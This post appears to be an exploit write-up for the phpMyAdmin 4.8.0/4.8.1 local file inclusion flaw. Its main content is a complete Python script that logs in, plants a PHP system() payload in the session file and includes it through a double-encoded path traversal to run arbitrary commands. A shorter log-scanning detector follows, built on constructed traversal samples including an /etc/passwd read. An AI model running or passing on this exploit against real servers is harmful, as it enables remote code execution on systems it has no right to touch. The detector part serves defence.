Security team ChaMd5 disclosed a Local File Inclusion vulnerability in phpMyAdmin 4.8.1, the latest version at the time. Exploiting this vulnerability can lead to Remote Code Execution.
```python
#!/usr/bin/env python
import re, requests, sys

# check python major version
if sys.version_info.major == 3:
    import html
else:
    from six.moves.html_parser import HTMLParser
    html = HTMLParser()

if len(sys.argv) < 7:
    usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
    print(usage.format(sys.argv[0], sys.argv[0]))
    sys.exit()

def get_token(content):
    # extract the CSRF token embedded in the page and undo HTML escaping
    s = re.search(r'token"\s*value="(.*?)"', content)
    token = html.unescape(s.group(1))
    return token

ipaddr = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
command = sys.argv[6]
url = "http://{}:{}{}".format(ipaddr, port, path)

# 1st req: check login page and version
url1 = url + "/index.php"
r = requests.get(url1)
content = r.content.decode('utf-8')
if r.status_code != 200:
    print("Unable to find the version")
    sys.exit()
s = re.search(r'PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
if s is None:
    print("Unable to find the version")
    sys.exit()
version = s.group(1)
if version != "4.8.0" and version != "4.8.1":
    print("The target version {} is not exploitable".format(version))
    sys.exit()

# get 1st token and cookie
cookies = r.cookies
token = get_token(content)

# 2nd req: login
p = {'token': token, 'pma_username': username, 'pma_password': password}
r = requests.post(url1, cookies=cookies, data=p)
content = r.content.decode('utf-8')
s = re.search(r'logged_in:(\w+),', content)
logged_in = s.group(1)
if logged_in == "false":
    print("Authentication failed")
    sys.exit()

# get 2nd token and cookie
cookies = r.cookies
token = get_token(content)

# 3rd req: execute query (the query text ends up in the PHP session file)
url2 = url + "/import.php"
# payload
payload = '''select '<?php system("{}") ?>';'''.format(command)
p = {'table': '', 'token': token, 'sql_query': payload}
r = requests.post(url2, cookies=cookies, data=p)
if r.status_code != 200:
    print("Query failed")
    sys.exit()

# 4th req: execute payload by including the session file through the target parameter
session_id = cookies.get_dict()['phpMyAdmin']
url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
r = requests.get(url3, cookies=cookies)
if r.status_code != 200:
    print("Exploit failed")
    sys.exit()

# get result
content = r.content.decode('utf-8', errors="replace")
s = re.search(r"select '(.*?)\n'", content, re.DOTALL)
if s is not None:
    print(s.group(1))
```
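As an added defensive example, not part of the original exploit or of phpMyAdmin itself, the detector below scans constructed Apache-style access-log lines for the index.php?target= pattern the exploit relies on: a double-encoded ? after a whitelisted page name, ../ traversal segments, and a reference to a PHP session file. The log lines, IP addresses and session id are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed access-log lines (not real traffic): one double-encoded traversal as in
# the exploit above, two benign requests, and one single-encoded traversal variant.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2018:10:00:01 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_abc123 HTTP/1.1" 200 512 "-" "python-requests/2.18.4"
10.0.0.6 - - [01/Jun/2018:10:00:02 +0000] "GET /phpmyadmin/index.php?target=db_sql.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jun/2018:10:00:03 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.8 - - [01/Jun/2018:10:00:04 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%3f/..%2f..%2fetc/passwd HTTP/1.1" 200 300 "-" "curl/7.58.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so %253f -> %3f -> ? is inspected as '?'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def target_reasons(uri):
    """List why a phpMyAdmin index.php?target= value looks like the LFI pattern."""
    parsed = urlparse(uri)
    if not parsed.path.endswith('/index.php'):
        return []
    reasons = []
    for raw in parse_qs(parsed.query).get('target', []):  # parse_qs decodes once
        target = decode_fully(raw)
        if '%' in raw:  # still encoded after one round: double-encoded value
            reasons.append('double-encoded target')
        if '..' in target.replace('\\', '/').split('/'):
            reasons.append('path traversal')
        if '?' in target:
            reasons.append('embedded ? after whitelisted page name')
        if '/sess_' in target:
            reasons.append('references PHP session file')
    return reasons

def scan_log(text):
    """Return (ip, status, reasons) for every log line whose target looks malicious."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        reasons = target_reasons(m.group('uri')) if m else []
        if reasons:
            hits.append((m.group('ip'), int(m.group('status')), reasons))
    return hits

if __name__ == '__main__':
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, ', '.join(reasons))
```

A 200 status on a flagged line is the higher-priority signal, since it indicates the include was served rather than rejected.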
https://www.exploit-db.com/exploits/50457
https://vulners.com/zdt/1337DAY-ID-36949
https://www.vulnspy.com/phpmyadmin-4.8.1/
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e